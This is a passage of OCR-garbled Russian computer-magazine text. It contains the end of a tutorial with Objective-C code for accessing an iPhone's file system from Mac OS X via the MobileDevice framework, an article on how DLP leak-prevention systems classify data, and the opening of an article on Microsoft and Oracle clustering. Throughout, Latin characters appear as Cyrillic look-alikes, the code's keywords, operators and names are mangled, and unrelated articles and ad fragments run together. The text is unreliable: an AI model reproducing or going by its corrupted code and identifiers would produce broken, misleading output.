становится прозрачным и он может взаимодействовать с сервисами, 
бегающими на мобильном устройстве, через сокеты. Для обмена 
данными с демоном используется библиотека ІіЬизЬтихсІ. Іі ЬірЬопе 
— это уже реализация протоколов сервисов Ю5. Если приложение 
работает с файловой системой мобильного устройства, то оно исполь- 
зует АРС- (или АРС2-) протокол. АРС (Арріе Рііе Соппесііоп) — это 
сервис, который доступен на каждом іРЬопе/іРоб ІоисЬ. Именно 
этот сервис ІТипез использует для обмена файлами с устройством. 



Собственно ІіЬтоЬіІесІеѵісе для работы с файловой системой ІРЬопе 
из Мае 05 X нам не понадобится: можно было бы заюзать связку 
изЬтихсІ/ІіЬірЬопе, но мы пойдем по другому пути и воспользуемся 
побочным продуктом разработки ІіЬтоЬіІесІеѵісе — результатами 
реверсинга МоЬіІейеѵісеТгатеѵѵогк. Этот закрытый фреймворк идет 
вместе с Мае 05 X и предоставляет высокоуровневый интерфейс к 
мобильному устройству. Найти его можно по пути /5у5Іет/І_іЬгагу/ 
РгіѵаІеРгатеѵѵогкз/МоЬіІеОеѵісеТгатеѵѵогк. Хедеры там, понятное 
дело, найти невозможно. А вот найти хедеры, которые появились 
после исследования этого фреймворка реверс-инженерами, можно 
на іЬеірЬопеѵѵікі.сопп . Как видно по найденому нами тоЬіІесІеѵісе.Ь, 
функции в МоЬіІеОеѵісеТгатеѵѵогк работают на достаточно высоком 
уровне, так что заморачиваться с Ы5В-мультиплексингом и про- 
чим нам не придется. В качестве примера работы с МоЬіІеОеѵісе. 
Ітатеѵѵогк мы создадим класс для обмена файлами с устройством. 

Ходим 

Кодить будем на О^есііѵе-С/Сосоа. Не забудь в проекте ХСобе доба- 
вить ссылку на МоЬіІеОеѵісеТгатеѵѵогк, чтобы все нормально слин- 
ковалось. Создадим два класса: МоЬіІеОеѵісе и МоЬіІе0еѵісе5егѵег. 
Первый будет отвечать за работу с файловой системой мобильного 
устройства, второй — за подключение/отключение устройств. 

Интерфейс наших классов 

#ітрогЬ <Сосоа/Сосоа.Ь> 

#ітрогЬ "МоЬіІеБеѵісе . Ь" 

@іпбегіасе МоЬіІеБеѵісе : ЫЗОЬзесЬ { 

@риЫіс 

збгисб аш_Цеѵісе * беѵ; 
збгисб аіс_соппесбіоп * сопп; 

} 

- (МоЬіІеБеѵісе *) іпіШібЬБеѵісе : 

(збгисб ат_с!еѵісе *) беѵісе; 

- (МоЬіІеБеѵісе *) сору; 

II В этом методе инициируем АРС соединение 

- (ВООЬ) соппесЬ; 

// Получаем свойства устройства, например тип или имя 

- (ЫЗЗЫіпд *) деЬѴаіие: (СРЗЫіпдПеЩ паше; 

/ / Собственно работа с файловой системой 

- (ВООЬ) рабЬЕхізб: (МЗЗбгіпд *) раЫі; 

- (ВООЬ) скжпІоабРіІе : (ЫЗЗбгіпд *) 

гешоЬе_рабЬ ЬоЬосабіоп: (МЗЗбгіпд *) 1оса1_рабЬ; 

- (ВООЬ) иріоабРііе: (ЫЗЗбгіпд *) ІосаІщэаЬЬ 

ЬоЬосабіоп: (ЫЗЗбгіпд *) гешобе_рабЬ; 

- (ВООЬ) ЬоѵтІоаЬВігесбогу : (ЫЗЗбгіпд *) гетобе_рабЬ 

ЬоЬосабіоп: (ЫЗЗбгіпд *) 1оса1_раЫі; 

- (ВООЬ) иріоабвігесбогу : (МЗЗбгіпд *) 1осаі_рабЬ 

ЬоЬосабіоп: (ЫЗЗбгіпд *) гетобе_рабЬ; 

- (ВООЬ) гетоѵеБігесбогу : (ЫЗЗбгіпд *) гетобе_раЬЬ; 

- (ВООЬ) ізБігесбогу : (ЫЗЗбгіпд *) раЫі; 

@епс( 

// Сервер сделаем синглтоном, поэтому методов 
// іпіб у него не будет, а ЬеіаиібЗегѵег возвращает 
/ / единственный инстанс класса 
Ѳіпбегіасе МоЬіІеБеѵісеЗегѵег : ЫЗОЬзесб { 

@риЫіс 

ЫЗМибаЫеАггау * МоЬіІеВеѵісез; 

} 

+ (МоЬіІеБеѵісеЗегѵег *) беііаиібЗегѵег ; 

@епЬ 

Реализация МоЬіІе0еѵісе5егѵег простая, поэтому приведу ее здесь 
полностью. Основная задача этого класса — получать уведомления 
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Атагок КЬуНітЬох 

ІіЬдросІ 




от МоЬіІеОеѵісе.ігатеѵѵогк о подключении/отключении устройств и 
формировать список подключенных, что бы потом хендлер устрой- 
ства можно было использовать при создании инстанса класса 
МоЬіІеВеѵісе. 

@ітр1етепкаЬіоп МоЬіІеВеѵісеЗегѵег 

збабіс МоЬіІеВеѵісеЗегѵег * ВеіаиІЬЗегѵег = піі; 

збакіс ѵоісі АтВеѵісеМокііісакіопСаІІЬаск ( 

зкгиск аш_сіеѵісе_поЬіТіса1:іоп_са11Ьаск_іпТо 
* іпіо) 

{ 

іі ( іпіо->тзд == АВЫСІ_М30_СОШЕСТЕВ) 

{ // Новое устройство 

МоЬіІеВеѵісе * Ьеѵісе = [ [МоЬіІеВеѵісе аііос] 

іпіШікЬВеѵісе: іпіо->с1еѵ] ; 

[беѵісе соппеск] ; 

[Веіаи1кЗегѵег->МоЬі1еВеѵісез абсЮЬзеск: беѵісе] ; 

} 

еізе ік (іпко->тзд == АВЫСІ_МЗС_ВІЗСОШЕСТЕВ) 

{ / / Отключили устройство 
Тог ( іпк і = 0 ; 

і <* .\|векаи1кЗегѵег->МоЬі1еВеѵісез соипк] ; 

+ + і) 

{ // Ищем его в своем списке и удаляем 

( ( (МоЬіІеВеѵісе * ) [Векаи1кЗегѵег->МоЬі1еВеѵісез 
оЬ^ескАкІпсІех: і])->йеѵ = = іпТо->йеѵ) 

{ 

[Веіаи1кЗегѵег->МоЬі1еВеѵісез гетоѵеОЬзескАкІпсІех: і] | 
Ьгеак; 

} 

} 

} 

} 



Структура ІіЬтоЬіІесІеѵісе 

іб (сопп == піі) гекшгп РАЬЗЕ; 
аіс_іі1е_геі 1і1е_геі; 

іі (АРСРіІеКеіОреп (сопп, [гетоке_ракЬ сЗкгіпд] , 
АРС_МОБР_КРАБ , 0, &іі1е_геі) != 0) 

гекигп РАЬЗЕ; 

РІЬР * 1оса1_іі1е = іореп( 

[1оса1_ракЬ сЗкгіпд], "хѵ" ); 

іі (1оса1_іі1е == ЖГЬЬ) { 

АРСРіІеКеіСІозе (сопп, іі1е_геі) ; 
гекигп N0; 

} 



+ (МоЬіІеВеѵісеЗегѵег *) ЬеІіаиІкЗегѵег 

{ 

11 (ВеіаиІкЗегѵег == піі) { 

ВеіаиІкЗегѵег = [ [МоЬіІеВеѵісеЗегѵег аііос] іпік] ; 
// Тут будем хранить список подключенных устройств 
Веіаи1кЗегѵег->МоЬі1еВеѵісез = 

ВмзМиЬаЫеАггау аііос] іпік] ; 



// Подпишемся к уведомлениям от МоЬіІеВеѵісе . ігатехлгогк 
зкгиск ат_с!еѵісе_покііісакіоп * зиЬзсгіркіоп; 
і| (АМВеѵісеЫокііісакіопЗиЬзсгіЬе ( 
&АтВеѵісеІ\ГокііісакіопСа11Ьаск, 

О , 0 , 0 , &зиЬзсгіркіоп) != 0) 

{ / / Не получилось : ( 

[Веіаи1кЗегѵег->МоЬі1еВеѵісез геіеазе] ; 

[ВеіаиІкЗегѵег геіеазе] ? 

ВеіаиІкЗегѵег = піі; 

} 

} 

гекигп ВеіаиІкЗегѵег; 

} 

@епЬ 



В качестве примера работы с девайсом через АРС приведу реали- 
зацию метода ЬоѵѵпІоасІРіІе класса МоЬіІеОеѵісе. Всю реализацию 
приводить здесь смысла нет, но ты можешь найти ее на диске. 



{ 



(ВООЬ) скжпІоасІРіІе : (ЬЗЗкгіпд *) гетоке_ракЪ. 

ЬоЬосаЬіоп: (ЫЗЗкгіпд *) 1оса1_ракЬ 



сЬаг Ьиііег [10000] ; 
іпк Іеп; 

Ьо { 

Іеп = зІ 2 еоі (Ьиііег) ; 

іі ( 

АРСРіІеКеіКеасІ (сопп, іі1е_геі, Ьиііег, &1еп) != 0) 

{ 

ісіозе (1оса1_іі1е) ; 

АРСРіІеКеіСІозе (сопп, іі1е_геі) ; 
геЬигп N0; 

} 

іхѵгіке (Ьиііег , Іеп, 1, 1оса1_іі1е) ; 

} хУЬіІе (Іеп == зігеоі (Ьиііег) ) ; 
ісіозе (1оса1_іі1е) ; 

АРСРіІеКеіСІозе (сопп, іі1е_геі) ; 
геЬигп УЕЗ; 

} 

Заключение 

Теперь, зная, как из Мае 05 X получить доступ к файловой системе 
мобильных устройств Арріе, для тебя несложно будет написать подо- 
бие іРЬопе ІЫсІегз и других альтернативных утилит. Дополнительным 
плюсом работы с іРосІ/іРЬопе из Мае 05 X является то, что нет необ- 
ходимости устанавливать стороннее программное обеспечение, как 
в виндах (іТипез, Арріе ппоЬіІе сіеѵісе зиррогі и так далее). Все будет 
работать на голой системе с диска, т 
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■ ■ Рустэм Хайретдинов, заместитель генерального директора ІпІоѴѴаІсЬ 



Как работают 

БЬР-системы? 

Разбираемся в технологиях предотвращения 
утечки информации 

Если быть достаточно последовательным в определениях, то можно сказать, что 
информационная безопасность началась именно с появления ОЬР-систем. До этого все 
продукты, которые занимались «информационной безопасностью», на самом деле защищали не 
информацию, а инфраструктуру — места хранения, передачи и обработки данных. 



Компьютер, приложение или канал, в которых находится, обраба- 
тывается или передается конфиденциальная информация, защи- 
щаются этими продуктами точно так же, как и инфраструктура, в 
которой обращается совершенно безобидная информация. То есть 
именно с появлением ПЬР-продуктов информационные системы 
научились наконец-то отличать конфиденциальную информацию 
от неконфиденциальной. Возможно, с встраиванием ПЬР-техноло- 
гий в информационную инфраструктуру компании смогут сильно 
сэкономить на защите информации — например, использовать 
шифрование только в тех случаях, когда хранится или передается 
конфиденциальная информация, и не шифровать информацию в 
других случаях. 

Однако это дело будущего, а в настоящем данные технологии 
используются в основном для защиты информации от утечек. 
Технологии категоризации информации составляют ядро ОЬР-сис- 
тем. Каждый производитель считает свои методы детектирования 
конфиденциальной информации уникальными, защищает их 
патентами и придумывает для них специальные торговые марки. 
Ведь остальные, отличные от этих технологий, элементы архитек- 
туры (перехватчики протоколов, парсеры форматов, управление 
инцидентами и хранилища данных) у большинства производителей 
идентичны, а у крупных компаний даже интегрированы с другими 
продуктами безопасности информационной инфраструктуры. 

В основном для категоризации данных в продуктах по защите корпо- 
ративной информации от утечек используются две основных груп- 
пы технологий — лингвистический (морфологический, семантичес- 
кий) анализ и статистические методы (Оі^йаі Ріп^егргіпщ, Посшпепі: 
ЭЫА, антиплагиат) . Каждая технология имеет свои сильные и 
слабые стороны, которые определяют область их применения. 



Лингвистический анализ 

Использование стоп-слов («секретно», «конфиденциально» и тому 
подобных) для блокировки исходящих электронных сообщений в 
почтовых серверах можно считать прародителем современных ИЬР- 
систем. Конечно, от злоумышленников это не защищает — удалить 
стоп-слово, чаще всего вынесенное в отдельный гриф документа, не 
составляет труда, при этом смысл текста нисколько не изменится. 
Толчок в разработке лингвистических технологий был сделан в 
начале этого века создателями етаіі-фильтров. Прежде всего, для 
защиты электронной почты от спама. Это сейчас в антиспамовских 
технологиях преобладают репутационные методы, а в начале века 
шла настоящая лингвистическая война между снарядом и броней 
— спамерами и антиспамерами. Помните простейшие методы для 
обмана фильтров, базирующихся на стоп-словах? Замена букв на 
похожие буквы из других кодировок или цифры, транслит, случай- 
ным образом расставленные пробелы, подчеркивания или переходы 
строк в тексте. Антиспамеры довольно быстро научились бороться с 
такими хитростями, но тогда появился графический спам и прочие 
хитрые разновидности нежелательной корреспонденции. 

Однако использовать антиспамерские технологии в ЭБР-продуктах 
без серьезной доработки невозможно. Ведь для борьбы со спамом 
достаточно делить информационный поток на две категории: спам 
и не спам. Метод Байеса, который используется при детектировании 
спама, дает только бинарный результат: «да» или «нет». Для защиты 
корпоративных данных от утечек этого недостаточно — нельзя 
просто делить информацию на конфиденциальную и неконфи- 
денциальную. Нужно уметь классифицировать информацию по 
функциональной принадлежности (финансовая, производствен- 
ная, технологическая, коммерческая, маркетинговая), а внутри 
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классов — категоризировать ее по уровню доступа (для свободного 
распространения, для ограниченного доступа, для служебного 
использования, секретная, совершенно секретная и так далее) . 
Большинство современных систем лингвистического анализа ис- 
пользуют не только контекстный анализ (то есть в каком контексте, 
в сочетании с какими другими словами используется конкретный 
термин), но и семантический анализ текста. Эти технологии рабо- 
тают тем эффективнее, чем больше анализируемый фрагмент. На 
большом фрагменте текста точнее проводится анализ, с большей 
вероятностью определяется категория и класс документа. При 
анализе же коротких сообщений (5М5, интернет-пейджеры) ничего 
лучшего, чем стоп-слова, до сих пор не придумано. Автор столкнулся 
с такой задачей осенью 2008 года, когда с рабочих мест многих бан- 
ков через мессенджеры пошли в Сеть тысячи сообщений типа «нас 
сокращают», «отберут лицензию», «отток вкладчиков», которые 
нужно было немедленно заблокировать у своих клиентов. 

Достоинства технологии 

Достоинства лингвистических технологий в том, что они работают 
напрямую с содержанием документов, то есть им не важно, где и 
как был создан документ, какой на нем гриф и как называется файл 
— документы защищаются немедленно. Это важно, например, при 
обработке черновиков конфиденциальных документов или для 
защиты входящей документации. Если документы, созданные и ис- 
пользующиеся внутри компании, еще как-то можно специфическим 
образом именовать, грифовать или метить, то входящие документы 
могут иметь не принятые в организации грифы и метки. Черновики 
(если они, конечно, не создаются в системе защищенного докумен- 
тооборота) тоже могут уже содержать конфиденциальную информа- 
цию, но еще не содержать необходимых грифов и меток. 

Еще одно достоинство лингвистических технологий — их обуча- 
емость. Если ты хоть раз в жизни нажимал в почтовом клиенте 
кнопку «Не спам», то уже представляешь клиентскую часть системы 
обучения лингвистического движка. Замечу, что тебе совершенно 
не нужно быть дипломированным лингвистом и знать, что именно 
изменится в базе категорий — достаточно указать системе ложное 
срабатывание, все остальное она сделает сама. 



Третьим достоинством лингвистических технологий является их 
масштабируемость. Скорость обработки информации пропорци- 
ональна ее количеству и абсолютно не зависит от количества катего- 
рий. 

До недавнего времени построение иерархической базы категорий 
(исторически ее называют БКФ — база контентной фильтрации, но 
это название уже не отражает настоящего смысла) выглядело неким 
шаманством профессиональных лингвистов, поэтому настройку 
БКФ можно было смело отнести к недостаткам. Но с выходом в 2010 
сразу нескольких продуктов-«автолингвистов» построение первич- 
ной базы категорий стало предельно простым — системе указыва- 
ются места, где хранятся документы определенной категории, и она 
сама определяет лингвистические признаки этой категории, а при 
ложных срабатываниях — самостоятельно обучается. Так что теперь 
к достоинствам лингвистических технологий добавилась простота 
настройки. 

И еще одно достоинство лингвистических технологий, которое хо- 
чется отметить в статье — возможность детектировать в информа- 
ционных потоках категории, не связанные с документами, находя- 
щимися внутри компании. Инструмент для контроля содержимого 
информационных потоков может определять такие категории, как 
противоправная деятельность (пиратство, распространение за- 
прещенных товаров), использование инфраструктуры компании в 
собственных целях, нанесение вреда имиджу компании (например, 
распространение порочащих слухов) и так далее. 

Недостатки технологий 

Основным недостатком лингвистических технологий является их 
зависимость от языка. Невозможно использовать лингвистический 
движок, разработанный для одного языка, в целях анализа друго- 
го. Это было особенно заметно при выходе на российский рынок 
американских производителей — они были не готовы столкнуться с 
российским словообразованием и наличием шести кодировок. Не- 
достаточно было перевести на русский язык категории и ключевые 
слова — в английском языке словообразование довольно простое, 
а падежи выносятся в предлоги, то есть при изменении падежа 
меняется предлог, а не само слово. Большинство существительных в 
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ОПТИМИЗАЦИЯ БИЗНЕС-ПРОЦЕССОВ, ПОВЫШЕНИЕ ЭФФЕКТИВНОСТИ РАБОТЫ ПЕРСОНАЛА 
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английском языке становятся глаголами без изменений слова. И так 
далее. В русском все не так — один корень может породить десятки 
слов в разных частях речи. 

В Германии американских производителей лингвистических 
технологий встретила другая проблема — так называемые «компа- 
унды», составные слова. В немецком языке принято присоединять 
определения к главному слову, в результате чего получаются слова, 
иногда состоящие из десятка корней. В английском языке такого 
нет, там слово — последовательность букв между двумя пробелами, 
соответственно английский лингвистический движок оказался 
неспособен обработать незнакомые длинные слова. 

Справедливости ради следует сказать, что сейчас эти проблемы во 
многом американскими производителями решены. Пришлось до- 
вольно сильно переделать (а иногда и писать заново) языковой дви- 
жок, но большие рынки России и Германии наверняка того стоят. 
Также сложно обрабатывать лингвистическими технологиями муль- 
тиязычные тексты. Однако с двумя языками большинство движков 
все-таки справляются, обычно это национальный язык + англий- 
ский — для большинства бизнес-задач этого вполне достаточно. 
Хотя автору встречались конфиденциальные тексты, содержащие, 
например, одновременно казахский, русский и английский, но это 
скорее исключение, чем правило. 

Еще одним недостатком лингвистических технологий для контроля 
всего спектра корпоративной конфиденциальной информации 
является то, что не вся конфиденциальная информация находится в 
виде связных текстов. Хотя в базах данных информация и хранится 
в текстовом виде, и нет никаких проблем извлечь текст из СУБД, 
полученная информация чаще всего содержит имена собственные 
— ФИО, адреса, названия компаний, а также цифровую информа- 
цию — номера счетов, кредитных карт, их баланс и прочее. Обра- 
ботка подобных данных с помощью лингвистики много пользы не 
принесет. То же самое можно сказать о форматах САП/САМ, то есть 
чертежах, в которых зачастую содержится интеллектуальная собс- 
твенность, программных кодах и медийных (видео/аудио) форма- 
тах — какие-то тексты из них можно извлечь, но их обработка также 
неэффективна. Еще года три назад это касалось и отсканированных 
текстов, но лидирующие производители ПБР-систем оперативно до- 
бавили оптическое распознавание и справились с этой проблемой. 
Но самым большим и наиболее часто критикуемым недостатком 
лингвистических технологий является все-таки вероятностный 
подход к категоризации. Если ты когда-нибудь читал письмо с кате- 
горией «РгоЪаЫу 5РАМ», то поймешь, о чем я. Если такое творится 
со спамом, где всего две категории (спам/не спам), можно себе 
представить, что будет, когда в систему загрузят несколько десятков 
категорий и классов конфиденциальности. Хотя обучением системы 
можно достигнуть 92-95% точности, для большинства пользовате- 
лей это означает, что каждое десятое или двадцатое перемещение 



информации будет ошибочно причислено не к тому классу со всеми 
вытекающими для бизнеса последствиями (утечка или прерывание 
легитимного процесса) . 

Обычно не принято относить к недостаткам сложность разработки 
технологии, но не упомянуть о ней нельзя. Разработка серьезного 
лингвистического движка с категоризацией текстов более чем по 
двум категориям — наукоемкий и довольно сложный технологи- 
чески процесс. Прикладная лингвистика — быстро развивающаяся 
наука, получившая сильный толчок в развитии с распространением 
интернет-поиска, но сегодня на рынке присутствуют единицы рабо- 
тоспособных движков категоризации: для русского языка их всего 
два, а для некоторых языков их просто еще не разработали. Поэтому 
на ПБР-рынке существует лишь пара компаний, которые способны 
в полной мере категоризировать информацию «налету». Можно 
предположить, что когда рынок ПБР увеличится до многомиллиар- 
дных размеров, на него с легкостью выйдет Соо^іе. С собственным 
лингвистическим движком, оттестированным на триллионах поис- 
ковых запросов по тысячам категорий, ему не составит труда сразу 
отхватить серьезный кусок этого рынка. 

Статистические методы 

Задача компьютерного поиска значимых цитат (почему именно 
«значимых» — немного позже) заинтересовала лингвистов еще в 
70-х годах прошлого века, если не раньше. Текст разбивался на куски 
определенного размера, с каждого из которых снимался хеш. Если 
некоторая последовательность хешей встречалась в двух текстах 
одновременно, то с большой вероятностью тексты в этих областях 
совпадали. 

Побочным продуктом исследований в этой области является, напри- 
мер, «альтернативная хронология» Анатолия Фоменко, уважаемого 
ученого, который занимался «корреляциями текстов» и однажды 
сравнил русские летописи разных исторических периодов. Удивив- 
шись, насколько совпадают летописи разных веков (более чем на 
60%) , в конце 70-х он выдвинул теорию, что наша хронология на 
несколько веков короче. Поэтому, когда какая-то выходящая на ры- 
нок ПБР-компания предлагает «революционную технологию поиска 
цитат», можно с большой вероятностью утверждать, что ничего, 
кроме новой торговой марки, компания не создала. 

Статистические технологии относятся к текстам не как к связной 
последовательности слов, а как к произвольной последовательности 
символов, поэтому одинаково хорошо работают с текстами на любых 
языках. Поскольку любой цифровой объект — хоть картинка, хоть 
программа — тоже последовательность символов, то те же методы 
могут применяться для анализа не только текстовой информации, 
но и любых цифровых объектов. И если совпадают хеши в двух 
аудиофайлах — наверняка в одном из них содержится цитата из 
другого, поэтому статистические методы являются эффективными 
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средствами защиты от утечки аудио и видео, активно применяющиеся 
в музыкальных студиях и кинокомпаниях. 

Самое время вернуться к понятию «значимая цитата». Ключевой 
характеристикой сложного хеша, снимаемого с защищаемого объ- 
екта (который в разных продуктах называется то Эі§іі:а1 Ріп^егргіпі:, 
то ЭосшпеШ: ЭКА) , является шаг, с которым снимается хеш. Как 
можно понять из описания, такой «отпечаток» является уникальной 
характеристикой объекта и при этом имеет свой размер. Это важно, 
поскольку если снять отпечатки с миллионов документов (а это объем 
хранилища среднего банка) , то для хранения всех отпечатков понадо- 
бится достаточное количество дискового пространства. От шага хеша 
зависит размер такого отпечатка — чем меньше шаг, тем больше отпе- 
чаток. Если снимать хеш с шагом в один символ, то размер отпечатка 
превысит размер самого образца. Если для уменьшения «веса» отпе- 
чатка увеличить шаг (например, 10 000 символов), то вместе с этим 
увеличивается вероятность того, что документ, содержащий цитату из 
образца длиной в 9 900 символов, будет конфиденциальным, но при 
этом проскочит незаметно. 

С другой стороны, если для увеличения точности детекта брать очень 
мелкий шаг, несколько символов, то можно увеличить количество 
ложных срабатываний до неприемлемой величины. В терминах текс- 
та это означает, что не стоит снимать хеш с каждой буквы — все слова 
состоят из букв, и система будет принимать наличие букв в тексте за 
содержание цитаты из текста-образца. Обычно производители сами 
рекомендуют некоторый оптимальный шаг снятия хешей, чтобы 
размер цитаты был достаточный и при этом вес самого отпечатка был 
небольшой — от 3% (текст) до 15% (сжатое видео) . В некоторых про- 
дуктах производители позволяют менять размер значимости цитаты, 
то есть увеличивать или уменьшать шаг хеша. 

Достоинства технологии 

Как можно понять из описания, для детектирования цитаты нужен 
объект-образец. И статистические методы могут с хорошей точнос- 
тью (до 100%) сказать, есть в проверяемом файле значимая цитата 
из образца или нет. То есть система не берет на себя ответственность 
за категоризацию документов — такая работа полностью лежит на 
совести того, кто категоризировал файлы перед снятием отпечатков. 
Это сильно облегчает защиту информации в случае, если на предпри- 
ятии в некотором месте (местах) хранятся нечасто изменяющиеся и 
уже категоризированные файлы. Тогда достаточно с каждого из этих 
файлов снять отпечаток, и система будет, в соответствии с настрой- 
ками, блокировать пересылку или копирование файлов, содержащих 
значимые цитаты из образцов. 

Независимость статистических методов от языка текста и нетексто- 
вой информации — тоже неоспоримое преимущество. Они хороши 
при защите статических цифровых объектов любого типа — карти- 
нок, аудио/видео, баз данных. Про защиту динамических объектов я 
расскажу в разделе «недостатки». 

Недостатки технологии 

Как и в случае с лингвистикой, недостатки технологии — обратная 
сторона достоинств. Простота обучения системы (указал системе 
файл, и он уже защищен) перекладывает на пользователя ответс- 
твенность за обучение системы. Если вдруг конфиденциальный файл 
оказался не в том месте либо не был проиндексирован по халатности 
или злому умыслу, то система его защищать не будет. Соответствен- 
но, компании, заботящиеся о защите конфиденциальной информа- 
ции от утечки, должны предусмотреть процедуру контроля того, как 
индексируются ЭБР-системой конфиденциальные файлы. 

Еще один недостаток — физический размер отпечатка. Автор неод- 
нократно видел впечатляющие пилотные проекты на отпечатках, ког- 
да ЭБР-система со 100% вероятностью блокирует пересылку докумен- 
тов, содержащих значимые цитаты из трехсот документов-образцов. 
Однако через год эксплуатации системы в боевом режиме отпечаток 



каждого исходящего письма сравнивается уже не с тремя сотнями, 
а с миллионами отпечатков-образцов, что существенно замедляет 
работу почтовой системы, вызывая задержки в десятки минут. 

Как я и обещал выше, опишу свой опыт по защите динамических объ- 
ектов с помощью статистических методов. Время снятия отпечатка 
напрямую зависит от размера файла и его формата. Для текстового 
документа типа этой статьи это занимает доли секунды, для полуто- 
рачасового МР4-фильма — десятки секунд. Для редкоизменяемых 
файлов это не критично, но если объект меняется каждую минуту 
или даже секунду, то возникает проблема: после каждого изменения 
объекта с него нужно снять новый отпечаток... Код, над которым 
работает программист, еще не самая большая сложность, гораздо 
хуже с базами данных, используемыми в биллинге, АБС или саіі-цен- 
трах. Если время снятия отпечатка больше, чем время неизменности 
объекта, то задача решения не имеет. Это не такой уж и экзотичес- 
кий случай — например, отпечаток базы данных, хранящей номера 
телефонов клиентов федерального сотового оператора, снимается 
несколько дней, а меняется ежесекундно. Поэтому, когда ЭБР-вендор 
утверждает, что его продукт может защитить вашу базу данных, мыс- 
ленно добавляйте слово «квазистатическую». 

Единство и борьба „ 
противоположностей 

Как видно из предыдущего раздела статьи, сила одной технологии 
проявляется там, где слаба другая. Лингвистике не нужны образцы, 
она категоризирует данные на лету и может защищать информа- 
цию, с которой случайно или умышленно не был снят отпечаток. 
Отпечаток дает лучшую точность и поэтому предпочтительнее для 
использования в автоматическом режиме. Лингвистика отлично 
работает с текстами, отпечатки — с другими форматами хранения 
информации. 

Поэтому большинство компаний-лидеров используют в своих раз- 
работках обе технологии, при этом одна из них является основной, а 
другая — дополнительной. Это связано с тем, что изначально продук- 
ты компании использовали только одну технологию, в которой ком- 
пания продвинулась дальше, а затем, по требованию рынка, была 
подключена вторая. Так, например, ранее ІпІоѴѴащЬ. использовал 
только лицензированную лингвистическую технологию МогрЬ-О- 
Бо^іс, а ѴѴеЬзепзе — технологию РгесізеЮ, относящуюся к категории 
Эі^йаі Еіп^егргіпі:, но сейчас компании используют оба метода. 

В идеале использовать две эти технологии нужно не параллельно, а 
последовательно. Например, отпечатки лучше справятся с опреде- 
лением типа документа — договор это или балансовая ведомость, 
например. Затем можно подключать уже лингвистическую базу, 
созданную специально для этой категории. Это сильно экономит 
вычислительные ресурсы. 

За пределами статьи остались еще несколько типов технологий, 
используемых в ПБР-продуктах. К таким относятся, например, ана- 
лизатор структур, позволяющий находить в объектах формальные 
структуры (номера кредитных карт, паспортов, ИНН и так далее), 
которые невозможно детектировать ни с помощью лингвистики, ни 
с помощью отпечатков. Также не раскрыта тема разного типа меток 
— от записей в атрибутных полях файла или просто специального на- 
именования файлов до специальных криптоконтейнеров. Последняя 
технология отживает свое, поскольку большинство производителей 
предпочитает не изобретать велосипед самостоятельно, а интегри- 
роваться с производителями ЭКМ-систем, такими как Огасіе ІКМ или 
МісгозоітКМЗ. 

ЭБР-продукты — быстроразвивающаяся отрасль информационной 
безопасности, у некоторых производителей новые версии выходят 
очень часто, более одного раза в год. 

С нетерпением ждем появления новых технологий анализа корпо- 
ративного информационного поля для увеличения эффективности 
защиты конфиденциальной информации, ЗС 
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Титаны 

кластерного 

фронта 

Решения для построения кластеров 
от Місгозой и Огасіе 

Как известно, кластеры позволяют решать проблемы, связанные с производительностью, 
балансировкой нагрузки и отказоустойчивостью. Для построения кластеров используются 
различные решения и технологии, как на программном, так и на аппаратном уровне. В этой 
статье будут рассмотрены программные решения, предлагаемые компаниями МісгозоА и Огасіе. 



Виды кластеров 

Кластер — это группа независимых компьютеров (так называемых 
узлов или нодов), к которой можно получить доступ как к единой 
системе. Кластеры могут быть предназначены для решения одной 
или нескольких задач. Традиционно выделяют три типа кластеров: 

• Кластеры высокой готовности или отказоустойчивые кластеры 
(Ы§Ь-аѵаі1аЬі1ііу сіизщгз или Іаііоѵег сіизгегз) используют избыточные 
узлы для обеспечения работы в случае отказа одного из узлов. 

• Кластеры балансировки нагрузки (1оасІ-Ъа1апсіп§ сіизгегз) служат 
для распределения запросов от клиентов по нескольким серверам, 
образующим кластер. 

• Вычислительные кластеры (сотріпе сіизгегз), как следует из назва- 
ния, используются в вычислительных целях, когда задачу можно раз- 
делить на несколько подзадач, каждая из которых может выполнять- 
ся на отдельном узле. Отдельно выделяют высокопроизводительные 
кластеры (НРС — Ы§;1і регіогтапсе сотригіп^ сіизііегз) , которые 
составляют около 82% систем в рейтинге суперкомпьютеров ТорБОО. 
Системы распределенных вычислений (§ігб) иногда относят к 
отдельному типу кластеров, который может состоять из террито- 
риально разнесенных серверов с отличающимися операционными 
системами и аппаратной конфигурацией. В случае грид-вычислений 
взаимодействия между узлами происходят значительно реже, чем 

в вычислительных кластерах. В грид-системах могут быть объеди- 
нены НРС-кластеры, обычные рабочие станции и другие устройс- 
тва. Такую систему можно рассматривать как обобщение понятия 
«кластер», ластеры могут быть сконфигурированы в режиме работы 
асгіѵе/асгіѵе, в этом случае все узлы обрабатывают запросы пользо- 
вателей и ни один из них не простаивает в режиме ожидания, как это 
происходит в варианте асгіѵе /раззіѵе. 



Огасіе ВАС и ЫеГѵѵогкЬоасІ Ваіапсіп^ являются примерами асгіѵе/ 
асгіѵе кластера. Раііоѵег С1изі:ег в ѴѴіпсІоѵѵз Бегѵег служит примером 
асгіѵе/раззіѵе кластера. Для организации асгіѵе/асгіѵе кластера тре- 
буются более изощренные механизмы, которые позволяют несколь- 
ким узлам обращаться к одному ресурсу и синхронизовать изме- 
нения между всеми узлами. Для организации кластера требуется, 
чтобы узлы были объединены в сеть, для чего наиболее часто исполь- 
зуется либо традиционный Егііегпеі:, либо ІпгіпіВапсІ. Программные 
решения могут быть довольно чувствительны к задержкам — так, 
например, для Огасіе ВАС задержки не должны превышать 15 мс. В 
качестве технологий хранения могут выступать ЕіЪге Сііаппеі, І5С5І 
или ЫР5 файловые сервера. Однако оставим аппаратные технологии 
за рамками статьи и перейдем к рассмотрению решений на уровне 
операционной системы (на примере ѴѴіпсІоѵѵз Бегѵег 2008 В2) и тех- 
нологиям, которые позволяют организовать кластер для конкретной 
базы данных (ОгасІеПатЪазе 11§), но налюбой поддерживаемой ОС. 

ѴѴіпсІоѵѵз СІизіегіпд 

У Місгозоіі: существуют решения для реализации каждого из трех 
типов кластеров. В состав ѴѴіпсІоѵѵз Бегѵег 2008 В2 входят две техноло- 
гии: ИеІѵѵогкЬоагіВаІапсіп^ (N13) СІизЩг и Раііоѵег СІизЩг. Существу- 
ет отдельная редакция ѴѴіпсІоѵѵз Бегѵег 2008 НРС Есіігіоп для органи- 
зации высокопроизводительных вычислительных сред. Эта редакция 
лицензируется только для запуска НРС-приложений, то есть на таком 
сервере нельзя запускать базы данных, ѵѵеЪ- или почтовые сервера. 
ЫЬВ-кластер используется для фильтрации и распределения ТСР/ІР- 
трафика между узлами. Такой тип кластера предназначен для работы 
